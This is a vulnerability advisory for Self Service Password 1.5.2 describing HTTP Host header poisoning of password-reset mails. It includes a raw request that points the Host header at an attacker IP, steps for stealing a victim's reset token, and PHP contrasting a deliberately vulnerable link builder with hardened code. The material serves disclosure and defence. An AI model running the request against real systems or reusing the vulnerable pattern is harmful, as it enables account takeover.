LDAP Tool Box Self Service Password 1.5.2 Account Takeover
LDAP Tool Box Self Service Password version 1.5.2 suffers from an account takeover vulnerability.
# Exploit Title: LDAP Tool Box Self Service Password v1.5.2 - Account takeover
# Date: 02/17/2023
# Exploit Author: Tahar BENNACEF (aka tar.gz)
# Software Link: https://github.com/ltb-project/self-service-password
# Version: 1.5.2
# Tested on: Ubuntu

Self Service Password is a PHP application that allows users to change their password in an LDAP directory. It is very useful for recovering an account without waiting for an action from an administrator, especially in Active Directory environments.

The password reset feature is prone to an HTTP Host header vulnerability that allows an attacker to tamper with the password-reset mail sent to the victim, and so potentially steal the victim's valid reset token. The attacker can then use it to perform an account takeover.

Steps to reproduce

1. Send a password reset request targeting the victim, setting the request's HTTP Host header to a server under the attacker's control:

POST /?action=sendtoken HTTP/1.1
Host: 111.111.111.111
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Origin: https://portal-lab.ngp.infra
Referer: https://portal-lab.ngp.infra/?action=sendtoken
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

login=test.reset

Because the vulnerable web application relies on the Host header of the password-reset request to craft the password-reset mail, the victim receives a mail containing a tampered link.

[image: image.png]

2. Start a web server and wait for the victim to click on the link. If the victim clicks on the tampered link, their browser sends the password reset token to the server set in the password-reset request's HTTP Host header.

[image: image.png]

3. Use the stolen token to reset the victim's account password.

Best regards
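The root cause above is a reset link built from the request's Host header. The following PHP is an added example, not code from the Self Service Password project, showing that unsafe pattern beside the defensive one: the link is derived from a configured canonical base URL instead, and the Host header is additionally checked against an allowlist so a spoofed request is rejected before any mail is sent. The configuration keys `reset_base_url` and `allowed_hosts`, the function names, the `action=resetbytoken` query parameter and the sample token are all assumptions made for the illustration.

```php
<?php
// Added example (not the Self Service Password project's code).
// Config keys, function names and the resetbytoken action are hypothetical.

// Vulnerable pattern (illustrative): the link's host comes from the request.
// $server['HTTP_HOST'] is attacker-controlled, so a spoofed Host header
// lands verbatim in the password-reset mail sent to the victim.
function build_reset_link_from_host(array $server, string $login, string $token): string
{
    $scheme = (!empty($server['HTTPS']) && $server['HTTPS'] !== 'off') ? 'https' : 'http';
    return $scheme . '://' . $server['HTTP_HOST'] . '/?action=resetbytoken'
        . '&login=' . rawurlencode($login) . '&token=' . rawurlencode($token);
}

// Hardened pattern: never read Host; use a base URL fixed in the configuration.
function build_reset_link(array $config, string $login, string $token): string
{
    $base = rtrim($config['reset_base_url'], '/'); // configured by the administrator
    return $base . '/?action=resetbytoken'
        . '&login=' . rawurlencode($login) . '&token=' . rawurlencode($token);
}

// Defence in depth: reject requests whose Host header is not one we serve.
// Comparison is case-insensitive and ignores an explicit port; bracketed
// IPv6 literals are left intact so "[::1]:443" is not mangled.
function host_is_allowed(?string $hostHeader, array $allowedHosts): bool
{
    if ($hostHeader === null || $hostHeader === '') {
        return false;
    }
    $host = strtolower(trim($hostHeader));
    if ($host[0] !== '[') {
        $host = explode(':', $host, 2)[0];
    }
    $allowed = array_map('strtolower', $allowedHosts);
    return in_array($host, $allowed, true);
}

// Constructed demo input mirroring the advisory's request: the application is
// served at portal-lab.ngp.infra, but the Host header names another server.
$config = [
    'reset_base_url' => 'https://portal-lab.ngp.infra',
    'allowed_hosts'  => ['portal-lab.ngp.infra'],
];
$spoofedRequest = ['HTTP_HOST' => '111.111.111.111', 'HTTPS' => 'on'];
$token = 'CONSTRUCTED-SAMPLE-TOKEN'; // placeholder, not a real reset token

// Vulnerable: the mailed link points at the Host-header value.
echo build_reset_link_from_host($spoofedRequest, 'test.reset', $token), PHP_EOL;
// Hardened: the mailed link always points at the configured base URL.
echo build_reset_link($config, 'test.reset', $token), PHP_EOL;
// Allowlist check: false for the spoofed Host, so the request should be refused.
var_dump(host_is_allowed($spoofedRequest['HTTP_HOST'], $config['allowed_hosts']));
// true for the legitimate host, with or without a port.
var_dump(host_is_allowed('Portal-Lab.ngp.infra:443', $config['allowed_hosts']));
```

The allowlist check belongs in front of every request handler, not only the token-sending one; a canonical base URL for outbound links means a Host header is never trusted for anything that leaves the server, and a web-server virtual host that only answers for its configured names provides the same protection one layer lower.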